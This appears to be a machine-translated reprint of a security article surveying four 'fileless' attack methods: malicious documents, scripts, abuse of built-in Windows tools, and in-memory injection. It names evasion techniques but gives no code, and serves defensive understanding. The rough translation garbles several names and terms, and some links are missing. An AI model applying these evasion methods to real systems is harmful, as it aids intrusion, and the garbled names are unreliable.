analysis of four common "no file" attacks

Posted by fierce at 2020-03-08

In order to deal with the increasing non file attacks, we need to clearly define the meaning of the word "no file", so as to analyze the attack means of such attacks and their impact on the existing environment and defense system.

In the field of security, no file attack means an extremely serious threat. The term "no file" is a term coined when exploring ways to bypass malicious file detection techniques.

File free attack technology, using a series of means, allows attackers to attack the system with anti-virus and application of white list strategy protection. Below is an overview of the attack means, including an accurate and clear description of the threat of file free attack.

Means 1: malicious documents

In many cases classified as file free attacks, most of them have the shadow of text files. In such attacks, the other party often uses malicious text documents (the most common is the attachment of e-mail) to achieve the following purposes:

Text documents can be used as flexible carriers and containers for other documents.

For example, attackers embed JavaScript files in Microsoft office documents, and use social engineering to induce the document recipient to double-click to execute the script. Other document types that can be embedded include PDF and RTF. Because these features are the normal features of each application, anti malware technology usually does not interfere with the use of these features.

Text documents can carry the exploitation of malicious code.

At present, the complexity of document function provides a broad attack area for vulnerability exploitation. In general, exploit can trigger the execution of bundled shellcode in the memory space of the application. In this way, the attacker can gain control of the terminal device without storing the malicious code on the local file system.

Text documents can perform the logic of malicious infection.

Modern documents support powerful scripting capabilities, for example, Microsoft office supports VBA macros. This kind of functional characteristics, using most of anti malware can not distinguish between malicious script and benign script, so that the attacker can implement malicious infection without compiling the program. The capabilities of document scripts include executing programs and downloading malicious code.

Although the text document itself is still stored in the local file system of the terminal device, it avoids the traditional direct storage of malicious executable files on disk. In most cases, a text document directs malicious code to execute directly in the memory of the terminal device.

For the case of an attacker using a text document to launch an attack, see write up the misuse of Microsoft office support for DDE:

Another scenario can be read:

attackers inserting themselves into the conversation to spread malware:

Method 2: malicious script

According to the traditional practice, malware creators tend to run attacks in the form of "no file", instead of compiling code into executable binary. In addition to the native support of text documents for scripts mentioned above, running scripts directly under Microsoft Windows has the following advantages:

Directly interact with the system, without the limitation of other applications, such as browser checking script.

Compared with compiled executable malicious files, it is more difficult to be detected by anti malware technology.

In order to avoid application behavior detection, malicious logic can be flexibly divided into several processes.

We can use obfuscation technology to delay and better avoid being analyzed and detected by anti malware technology.

Microsoft Windows script interpreter includes PowerShell, VBScript, batch file and JavaScript.

The corresponding applications are:

Powershell.exe, cscript.exe, cmd.exe and mshta.exe.

In addition, the Linux subsystem provided by windows makes the scripting languages it supports more widely. One of the challenges posed by this issue is the need for companies to limit the abuse of these tools. See gal bitensky's article:

However, attackers can easily confuse attack scripts with various framework tools.

These confusing measures include Daniel Bohannon's invoke obfuscation and invoke DOS framework for PowerShell. Please refer to Minerva's analysis of remote's script obfuscation for the corresponding practical operation.

Means 3: living off the land

Discussion of file free attacks often includes abuse of many built-in tools in Microsoft Windows. These tools make it easy for an attacker to "jump" from one stage to another without executing any compiled binary executables. This mode of operation is sometimes referred to as "flat takeoff.".

Once the attacker's malicious code can interact with the local program, the attacker may use the system's native tools to carry out the next attack, including downloading the attached other malicious code, starting the program, executing the script, stealing data, expanding horizontally, maintaining access, etc.

The tools that attackers call for these purposes include regsvr32.exe, rundll32.exe, certutil.exe and schtasks.exe. For a more comprehensive understanding of the built-in programs, libraries and scripts used in the system, please refer to the lolbas project of oddvar MOE.

Windows management specification (WMI) is a built-in tool of windows system, which provides an excellent opportunity for attackers to take off from the ground. WMI allows attackers to manipulate most of the device's configuration by running the wmic.exe program and executing scripts (such as PowerShell).

These tools are all self-contained and trusted, so anti malware technology is difficult to detect and limit. For details on file free attacks using WMI, see Matt Graeber's article:

Abusing WMI to build a persistent, asynchronous, and fileless backdoor (Note 1)

Attackers rely on the trusted tools of these systems, which significantly improve their chances of escaping from anti malware tools and application white list restrictions. For more such cases, please refer to apt29's use of WMI and PowerShell to plant files backdoors of Matthew dunwood.

Method 4: memory malicious code

Today's anti-virus products are quite good at detecting malicious files on disk; however, to detect malicious code that only exists in memory, they often do half the work with half the effort. The memory is volatile and dynamic, which makes it easy for malware to change its shape. At the same time, it can run freely without any anti malware detection.

Once an attacker starts executing malicious code on a terminal device (possibly using the methods mentioned above), it is possible for him to unpack the malware into memory without leaving any trace on the disk. This process may include extracting code into the memory space of the process itself. In other cases, malicious programs may inject code into other trusted processes or other normal processes.

Examples of memory attack techniques include the following:

In the case of not taking advantage of system vulnerability, memory injection of system functions is used. For example, Apis including virtualallocex and writeprocessmemory are often abused by malware for memory injection. For details, refer to gal bitensky's overview of the azorult attack.

VirtualAllocEx WriteProcessMemory

It is possible for an attacker to bundle the compiled executable program into the script, thus freeing the malicious attack load to memory when the script is running. The common (one example) tool for this attack is powerplot. The operation process can be read the ghostminer analysis of ASAF aprozper and gal bitensky (Note 2). Chris Trump's veil framework is another example.

Process doppelg ä ng is another file free technology that does not involve classical memory injection. Instead, attackers take advantage of Microsoft Windows NTFS's thing (access) feature: temporarily modifying trusted memory files without synchronizing changes to disk. Anton Ivanov, Fedor sinitsyn and orkhan mamedov analyzed the technology in synack malware.

Process Doppelgänging

Memory retention technology allows attackers to bypass the control of many anti malicious technologies, including the application of white list strategy. Although anti-virus tools try to track the behavior of memory injection, the attacker's infection means make it impossible to prevent.

ASAF aprozper's shows how vulnerable various detection methods are.

"No file" attacks have become the norm

Although only a few attacks and malware families are in the form of "no file" in the whole process, most malware will add some features of "no file" in order to avoid the detection of defense system. Compared with determining whether the threat is "no file" in the whole process, we consider what strategies and methods are used to bypass the defense system by malicious attacks, which may be more effective for improving the protection in the future.

Attackers may use malicious text documents, scripts, flat takeoff, and memory injection in combination with the above. These file free attacks, with the help of the functional characteristics of applications and operating systems, as well as the weakness of anti malware technology that can not effectively detect and prevent the abuse of system tools, make "file free" attacks become the new normal of attacks.

This is why more and more enterprises pay attention to

This is specifically designed to counter file less attack strategies: 。

Reference resources

Note 1: Chinese translation uses WMI to build a backdoor without files (basic)

Ghostminer analysis: a new way of mining without files

Reference: coming and going: analysis of JS? Powmet file free malware

- End -

Look at snow ID: strokmitream

This article is compiled by look snow translation group, and proofread by Yulin primary school students

Source Lenny Zeltser @ Minerva

Reprint please indicate that it is from xuekan community

Good book recommendation:

Buy now!

Hot technology article recommendation:

Top level exception handling function of moonu secure learning notes

STM32 reverse firmware dump tutorial

Od CE search data summary (2)

Od CE search data summary

Official account ID:ikanxue official micro-blog: see snow safety

Business cooperation: [email protected]